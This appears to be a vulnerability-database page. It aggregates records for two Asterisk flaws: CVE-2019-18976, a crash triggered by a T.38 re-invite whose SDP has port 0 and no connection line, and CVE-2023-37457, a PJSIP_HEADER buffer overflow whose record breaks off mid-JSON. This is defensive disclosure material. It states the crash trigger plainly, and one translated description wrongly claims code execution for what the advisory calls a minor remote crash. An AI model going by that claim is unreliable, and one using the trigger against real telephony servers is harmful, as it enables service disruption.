Links https://issues.asterisk.org/jira/browse/ASTERISK-28612
Asterisk Project Security Advisories are posted at
http://www.asterisk.org/security
This document may be superseded by later versions; if so, the latest
version will be posted at http://downloads.digium.com/pub/security/.pdf
and http://downloads.digium.com/pub/security/.html
Revision History
Date Editor Revisions Made
November 12, 2019 Ben Ford Initial Revision
November 21, 2019 Ben Ford Added “Posted On” date
Asterisk Project Security Advisory -
Copyright © 2019 Digium, Inc. All Rights Reserved.
Permission is hereby granted to distribute and publish this advisory in its original, unaltered form
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201911-1367",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "asterisk",
"scope": "gte",
"trust": 1.0,
"vendor": "digium",
"version": "13.0.0"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "digium",
"version": "13.21"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"model": "asterisk",
"scope": "lte",
"trust": 1.0,
"vendor": "digium",
"version": "13.29.1"
},
{
"model": "asterisk",
"scope": "lte",
"trust": 0.8,
"vendor": "digium",
"version": "13.x"
},
{
"model": "certified asterisk",
"scope": "lte",
"trust": 0.8,
"vendor": "digium",
"version": "13.21-x"
},
{
"model": "asterisk",
"scope": "lte",
"trust": 0.6,
"vendor": "sangoma",
"version": "\u003c=13.*"
},
{
"model": "certified asterisk",
"scope": "lte",
"trust": 0.6,
"vendor": "sangoma",
"version": "\u003c=13.21-*"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-01312"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012748"
},
{
"db": "NVD",
"id": "CVE-2019-18976"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21:cert1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21:cert2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21:cert3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21:cert4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "13.29.1",
"versionStartIncluding": "13.0.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-18976"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "bford",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201911-1292"
}
],
"trust": 0.6
},
"cve": "CVE-2019-18976",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2019-18976",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2020-01312",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2019-18976",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-18976",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2020-01312",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201911-1292",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-01312"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012748"
},
{
"db": "NVD",
"id": "CVE-2019-18976"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1292"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered in res_pjsip_t38.c in Sangoma Asterisk through 13.x and Certified Asterisk through 13.21-x. If it receives a re-invite initiating T.38 faxing and has a port of 0 and no c line in the SDP, a NULL pointer dereference and crash will occur. This is different from CVE-2019-18940. This vulnerability CVE-CVE-2019-18940 Is a different vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Sangoma Technologies Asterisk is an open source telephone exchange (PBX) system software. The software supports voicemail, multi-party voice conferencing, interactive voice response (IVR), and more. The vulnerability originates from improper design or implementation during code development of a network system or product. An attacker could use this vulnerability to execute malicious code. Asterisk Project Security Advisory -\n\n Product Asterisk \n Summary Re-invite with T.38 and malformed SDP causes crash. \n Nature of Advisory Remote Crash \n Susceptibility Remote Authenticated Sessions \n Severity Minor \n Exploits Known No \n Reported On November 07, 2019 \n Reported By Salah Ahmed \n Posted On November 21, 2019 \n Last Updated On November 21, 2019 \n Advisory Contact bford AT sangoma DOT com \n CVE Name CVE-2019-18976 \n\n Description If Asterisk receives a re-invite initiating T.38 \n faxing and has a port of 0 and no c line in the SDP, a \n crash will occur. \n Modules Affected res_pjsip_t38.c \n\n Resolution If T.38 faxing is not needed, then the \u201ct38_udptl\u201d \n configuration option in pjsip.conf can be set to \u201cno\u201d to \n disable the functionality. This option automatically \n defaults to \u201cno\u201d and would have to be manually turned on to \n experience this crash. \n \n If T.38 faxing is needed, then Asterisk should be upgraded \n to a fixed version. \n\n Affected Versions \n Product Release \n Series \n Asterisk Open Source 13.x All versions \n Certified Asterisk 13.21 All versions \n\n Corrected In \n Product Release \n Asterisk Open Source 13.29.2 \n Certified Asterisk 13.21-cert5 \n\n Patches \n SVN URL Revision \n http://downloads.asterisk.org/pub/security/AST-2019-008-13.diff Asterisk 13 \n http://downloads.asterisk.org/pub/security/AST-2019-008-13.21.diff Certified \n Asterisk \n 13.21-cert5 \n\n Links https://issues.asterisk.org/jira/browse/ASTERISK-28612 \n\n Asterisk Project Security Advisories are posted at \n http://www.asterisk.org/security \n \n This document may be superseded by later versions; if so, the latest \n version will be posted at http://downloads.digium.com/pub/security/.pdf \n and http://downloads.digium.com/pub/security/.html \n\n Revision History\n Date Editor Revisions Made \n November 12, 2019 Ben Ford Initial Revision \n November 21, 2019 Ben Ford Added \u201cPosted On\u201d date \n\n Asterisk Project Security Advisory -\n Copyright \u00a9 2019 Digium, Inc. All Rights Reserved. \n Permission is hereby granted to distribute and publish this advisory in its\n original, unaltered form",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-18976"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012748"
},
{
"db": "CNVD",
"id": "CNVD-2020-01312"
},
{
"db": "PACKETSTORM",
"id": "155436"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-18976",
"trust": 3.1
},
{
"db": "PACKETSTORM",
"id": "155436",
"trust": 1.7
},
{
"db": "CS-HELP",
"id": "SB2019112218",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012748",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-01312",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.4421",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1292",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-01312"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012748"
},
{
"db": "PACKETSTORM",
"id": "155436"
},
{
"db": "NVD",
"id": "CVE-2019-18976"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1292"
}
]
},
"id": "VAR-201911-1367",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-01312"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-01312"
}
]
},
"last_update_date": "2023-12-18T12:27:54.815000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "AST-2019-008",
"trust": 0.8,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-008.html"
},
{
"title": "Security Advisories",
"trust": 0.8,
"url": "https://www.asterisk.org/downloads/security-advisories"
},
{
"title": "Patch for Sangoma Technologies Asterisk and Sangoma Technologies Certified Asterisk Code Issue Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/196675"
},
{
"title": "Sangoma Technologies Asterisk and Sangoma Technologies Certified Asterisk Fixes for code issue vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=104688"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-01312"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012748"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1292"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-476",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-012748"
},
{
"db": "NVD",
"id": "CVE-2019-18976"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "https://seclists.org/fulldisclosure/2019/nov/20"
},
{
"trust": 2.2,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-008.html"
},
{
"trust": 2.2,
"url": "https://packetstormsecurity.com/files/155436/asterisk-project-security-advisory-ast-2019-008.html"
},
{
"trust": 1.6,
"url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html"
},
{
"trust": 1.6,
"url": "https://www.asterisk.org/downloads/security-advisories"
},
{
"trust": 1.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2019112218?affchecked=1"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18976"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-18976"
},
{
"trust": 0.6,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-007.html"
},
{
"trust": 0.6,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-006.html"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/asterisk-denial-of-service-via-t-38-sdp-re-invite-30937"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4421/"
},
{
"trust": 0.1,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-008-13.diff"
},
{
"trust": 0.1,
"url": "https://issues.asterisk.org/jira/browse/asterisk-28612"
},
{
"trust": 0.1,
"url": "http://downloads.digium.com/pub/security/.pdf"
},
{
"trust": 0.1,
"url": "http://www.asterisk.org/security"
},
{
"trust": 0.1,
"url": "http://downloads.digium.com/pub/security/.html"
},
{
"trust": 0.1,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-008-13.21.diff"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-01312"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012748"
},
{
"db": "PACKETSTORM",
"id": "155436"
},
{
"db": "NVD",
"id": "CVE-2019-18976"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1292"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-01312"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012748"
},
{
"db": "PACKETSTORM",
"id": "155436"
},
{
"db": "NVD",
"id": "CVE-2019-18976"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1292"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-01-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-01312"
},
{
"date": "2019-12-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-012748"
},
{
"date": "2019-11-21T23:55:55",
"db": "PACKETSTORM",
"id": "155436"
},
{
"date": "2019-11-22T17:15:11.833000",
"db": "NVD",
"id": "CVE-2019-18976"
},
{
"date": "2019-11-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201911-1292"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-01-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-01312"
},
{
"date": "2019-12-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-012748"
},
{
"date": "2022-06-03T14:41:01.313000",
"db": "NVD",
"id": "CVE-2019-18976"
},
{
"date": "2022-04-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201911-1292"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201911-1292"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sangoma Asterisk and Certified Asterisk In NULL Pointer dereference vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-012748"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201911-1292"
}
],
"trust": 0.6
}
}
FKIE_CVE-2023-37457
Vulnerability from fkie_nvd - Published: 2023-12-14 20:15 - Updated: 2024-11-21 08:11
Severity ?
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
8.2 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
8.2 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
Summary
Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk versions 18.20.0 and prior, 20.5.0 and prior, and 21.0.0; as well as ceritifed-asterisk 18.9-cert5 and prior, the 'update' functionality of the PJSIP_HEADER dialplan function can exceed the available buffer space for storing the new value of a header. By doing so this can overwrite memory or cause a crash. This is not externally exploitable, unless dialplan is explicitly written to update a header based on data from an outside source. If the 'update' functionality is not used the vulnerability does not occur. A patch is available at commit a1ca0268254374b515fa5992f01340f7717113fa.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2AD913C8-79A0-4FE9-9BBD-52BD3260AB2F",
"versionEndIncluding": "18.20.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DA2E162A-E994-4F25-AE13-D7C889394AC4",
"versionEndIncluding": "20.5.0",
"versionStartIncluding": "19.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:asterisk:21.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D3E690E3-3E92-42ED-87DD-1C6B838A3FF9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:*:*:*:*:*:*:*",
"matchCriteriaId": "2AFE2011-05AA-45A6-A561-65C6C664DA7B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1:*:*:*:*:*:*",
"matchCriteriaId": "C1117AA4-CE6B-479B-9995-A9F71C430663",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc1:*:*:*:*:*:*",
"matchCriteriaId": "775041BD-5C86-42B6-8B34-E1D5171B3D87",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc2:*:*:*:*:*:*",
"matchCriteriaId": "55EC2877-2FF5-4777-B118-E764A94BCE56",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc3:*:*:*:*:*:*",
"matchCriteriaId": "EB0392C9-A5E9-4D71-8B8D-63FB96E055A5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc4:*:*:*:*:*:*",
"matchCriteriaId": "09AF962D-D4BB-40BA-B435-A59E4402931C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert2:*:*:*:*:*:*",
"matchCriteriaId": "559D1063-7F37-44F8-B5C6-94758B675FDF",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert3:*:*:*:*:*:*",
"matchCriteriaId": "185B2B4B-B246-4379-906B-9BDA7CDD4400",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc1:*:*:*:*:*:*",
"matchCriteriaId": "73D3592D-3CE5-4462-9FE8-4BCB54E74B5B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc2:*:*:*:*:*:*",
"matchCriteriaId": "B3CCE9E0-5DC4-43A2-96DB-9ABEA60EC157",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:-:*:*:*:*:*:*",
"matchCriteriaId": "1EAD713A-CBA2-40C3-9DE3-5366827F18C7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert1:*:*:*:*:*:*",
"matchCriteriaId": "A5F5A8B7-29C9-403C-9561-7B3E96F9FCA8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert10:*:*:*:*:*:*",
"matchCriteriaId": "F9B96A53-2263-463C-9CCA-0F29865FE500",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert11:*:*:*:*:*:*",
"matchCriteriaId": "A53049F1-8551-453E-834A-68826A7AA959",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert12:*:*:*:*:*:*",
"matchCriteriaId": "B224A4E9-4B6B-4187-B0D6-E4BAE2637960",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert2:*:*:*:*:*:*",
"matchCriteriaId": "9501DBFF-516D-4F26-BBF6-1B453EE2A630",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert3:*:*:*:*:*:*",
"matchCriteriaId": "9D3E9AC0-C0B4-4E87-8D48-2B688D28B678",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert4:*:*:*:*:*:*",
"matchCriteriaId": "1A8628F6-F8D1-4C0C-BD89-8E2EEF19A5F9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert5:*:*:*:*:*:*",
"matchCriteriaId": "E27A6FD1-9321-4C9E-B32B-D6330CD3DC92",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert6:*:*:*:*:*:*",
"matchCriteriaId": "B6BF5EDB-9D17-453D-A22E-FDDC4DCDD85B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert7:*:*:*:*:*:*",
"matchCriteriaId": "4C75A21E-5D05-434B-93DE-8DAC4DD3E587",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert8:*:*:*:*:*:*",
"matchCriteriaId": "1D725758-C9F5-4DB2-8C45-CC052518D3FD",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert9:*:*:*:*:*:*",
"matchCriteriaId": "B5E2AECC-B681-4EA5-9DE5-2086BB37A5F4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert1:*:*:*:*:*:*",
"matchCriteriaId": "79EEB5E5-B79E-454B-8DCD-3272BA337A9E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert2:*:*:*:*:*:*",
"matchCriteriaId": "892BAE5D-A64E-4FE0-9A99-8C07F342A042",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert3:*:*:*:*:*:*",
"matchCriteriaId": "1A716A45-7075-4CA6-9EF5-2DD088248A5C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert4:*:*:*:*:*:*",
"matchCriteriaId": "80EFA05B-E22D-49CE-BDD6-5C7123F1C12B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert5:*:*:*:*:*:*",
"matchCriteriaId": "20FD475F-2B46-47C9-B535-1561E29CB7A1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk versions 18.20.0 and prior, 20.5.0 and prior, and 21.0.0; as well as ceritifed-asterisk 18.9-cert5 and prior, the \u0027update\u0027 functionality of the PJSIP_HEADER dialplan function can exceed the available buffer space for storing the new value of a header. By doing so this can overwrite memory or cause a crash. This is not externally exploitable, unless dialplan is explicitly written to update a header based on data from an outside source. If the \u0027update\u0027 functionality is not used the vulnerability does not occur. A patch is available at commit a1ca0268254374b515fa5992f01340f7717113fa."
},
{
"lang": "es",
"value": "Asterisk es un conjunto de herramientas de telefon\u00eda y centralita privada de c\u00f3digo abierto. En las versiones de Asterisk 18.20.0 y anteriores, 20.5.0 y anteriores y 21.0.0; as\u00ed como ceritifed-asterisk 18.9-cert5 y anteriores, la funcionalidad de \u0027actualizaci\u00f3n\u0027 de la funci\u00f3n de dialplan PJSIP_HEADER puede exceder el espacio de b\u00fafer disponible para almacenar el nuevo valor de un encabezado. Al hacerlo, esto puede sobrescribir la memoria o provocar un bloqueo. Esto no se puede explotar externamente, a menos que el dialplan est\u00e9 escrito expl\u00edcitamente para actualizar un encabezado en funci\u00f3n de datos de una fuente externa. Si no se utiliza la funcionalidad de \u0027actualizaci\u00f3n\u0027, la vulnerabilidad no se produce. Hay un parche disponible en el commit a1ca0268254374b515fa5992f01340f7717113fa."
}
],
"id": "CVE-2023-37457",
"lastModified": "2024-11-21T08:11:44.807",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
